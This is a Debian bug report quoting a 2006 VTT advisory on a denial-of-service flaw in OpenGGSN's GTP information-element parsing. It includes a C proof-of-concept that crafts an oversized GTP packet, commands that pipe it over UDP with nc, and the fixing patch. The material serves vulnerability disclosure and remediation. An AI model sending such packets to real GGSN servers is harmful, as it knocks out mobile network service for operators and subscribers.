Package: openggsn
Severity: important
Tags: security patch etch

This was sent to [EMAIL PROTECTED] in 2006:

OpenGGSN Denial of Service Vulnerability

TNT project:

Copyright © 2006 VTT


OpenGGSN is an open source implementation of a Gateway GPRS Support Node
(GGSN). It is used by mobile operators as an interface between the Internet and
the rest of the mobile network infrastructure. A Denial of Service (DoS)
vulnerability -- caused by an infinite loop in GTPIE parsing when a UDP packet
with more than GTPIE_SIZE (256) elements is received -- was found with the
Codenomicon GTP test suite. A fix developed by VTT is provided with this


Table of Contents


    Codenomicon GTP Test Suite

Affected Products
Exploiting The Vulnerability
About VTT



GPRS Tunnelling Protocol (or GTP) is an IP based protocol used within GSM and
UMTS networks. The GTP protocol is layered on top of UDP. There are in fact
three separate protocols, GTP-C, GTP-U and GTP'. GTP-C is used within the GPRS
core network for signalling between GPRS Support Nodes (GGSNs and SGSNs). This
allows the SGSN to activate a session on the users behalf (PDP context
activation), to deactivate the same session, to adjust quality of service
parameters or to update a session for a subscriber who has just arrived from
another SGSN. GTP-U is used for carrying user data within the GPRS core network
and between the Radio Access Network and the core network. The user data
transported can be packets in any of IPv4, IPv6 or PPP formats.


OpenGGSN is an open source implementation of a Gateway GPRS Support Node
(GGSN). It is used by mobile operators as the interface between the Internet
and the rest of the mobile network infrastructure.

Codenomicon GTP Test Suite

Codenomicon GTP Test Tools help proactively eliminate security flaws in GTP
implementations. The test tool converts your test workstation into a GPRS
Support Node for testing the robustness of GPRS Tunneling Protocol (GTP)
implementations. The test tools test GTP implementations for development flaws
using the unique Codenomicon fault injection technology.

Affected Products

  * OpenGGSN versions 0.83 and 0.84


VTT's TNT project ( used 
GTP test suite to test an OpenGGSN installation based on Debian unstable/sid 
distribution. One of the findings is that running any testcase containing 
a message with more than 256 information elements in the payload caused 
the OpenGGSN to go into a infinite loop and thus causing an Denial of Service 
condition and unnecessary consumption of CPU resources.

Exploiting The Vulnerability

The attacker can make a Denial of Service attack simply by sending a UDP
message containing more than 256 information elements to the OpenGGSN server.

 *  OpenGGSN - Gateway GPRS Support Node
 *  Copyright (C) 2002, 2003, 2004 Mondru AB.
 *  The contents of this file may be used under the terms of the GNU
 *  General Public License Version 2, provided that the above copyright
 *  notice and this permission notice is included in all copies or
 *  substantial portions of the software.
 *  Copyright (C) 2006 VTT

 * Proof of concept for OpenGGSN GTPIE parsing Denial-of-Service condition.
 * compile in openggsn-0.84/gtp directory:
 * cc -Wall -g -O0 -L.libs -lgtp gtpie_dos.c -o gtpie_dos
 * run OpenGGSN:
 * ./ggsn --fg --debug -c ../examples/ggsn.conf -l
 * run PoC:
 * ./gtpie_dos | nc -q 0 -u 3386
 * resulting DoS:
 * 29972 root      25   0  133m 3488 1412 R 98.5  0.3   0:05.23 lt-ggsn
 * UDP payload:
 * ./gtpie_dos | hexdump -x
 * 0000000    101e    0202    0100    0000    ffff    ffff    beef    dead
 * 0000010    0000    0000    0101    0101    0101    0101    0101    0101
 * 0000020    0101    0101    0101    0101    0101    0101    0101    0101
 * 0000210    0101    0101    0101
 * 0000216

#include <stdio.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

#include "pdp.h"
#include "gtp.h"
#include "gtpie.h"

int main(void)
int i;
struct gtp0_packet *packet=calloc(1, sizeof(struct gtp0_packet));

/* header*/
struct gtp0_header *gtp0 = (struct gtp0_header*) packet;

/* Initialise "standard" GTP0 header */

int length = GTP0_HEADER_SIZE;

/* data */
uint8_t qr=0x1;
for (i=0; i<=GTPIE_SIZE; i++) {
        gtpie_tv0(packet, &length, GTP_MAX, GTPIE_CAUSE,
              sizeof(qr), &qr);

gtp0->length = hton16(length - GTP0_HEADER_SIZE);

write(STDOUT_FILENO, (void *) packet, (size_t) length);

return 0;


The problem lies in the parsing of information elements in GTP messages, which
is implemented in the gtpie_decaps function of gtp/gtpie.c file.

The implementation has a bug that does not check if there are too many
information elements in the message thus causing the software to loop
infinitely in the while-loop.

In addition, handling routine for the error situation had to be implemented
outside the while-loop.

--- openggsn-0.84.orig/gtp/gtpie.c
+++ openggsn-0.84/gtp/gtpie.c
@@ -188,7 +188,7 @@

   memset(ie, 0, 4 * GTPIE_SIZE);

-  while (p<end) {
+  while ((p<end) && (j<GTPIE_SIZE)) {
     if (GTPIE_DEBUG) {
       printf("The packet looks like this:\n");
       for( i=0; i<(end-p); i++) {
@@ -346,6 +346,10 @@
                            (unsigned long) p, (unsigned long) end);
     return 0; /* We landed at the end of the packet: OK */
+  else if (!(j<GTPIE_SIZE)) {
+    if (GTPIE_DEBUG) printf("GTPIE too many elements.\n");
+    return EOF; /* We received too many information elements */
+  }
   else {
     if (GTPIE_DEBUG) printf("GTPIE exceeded end of packet. %lx %lx\n",
                            (unsigned long) p, (unsigned long) end);

About VTT

VTT is an impartial expert organisation. Its objective is to develop new
technologies, create new innovations and value added thus increasing customer's
competencies. With its know how VTT produces research, development, testing and
information services to public sector and companies as well as international

Reply via email to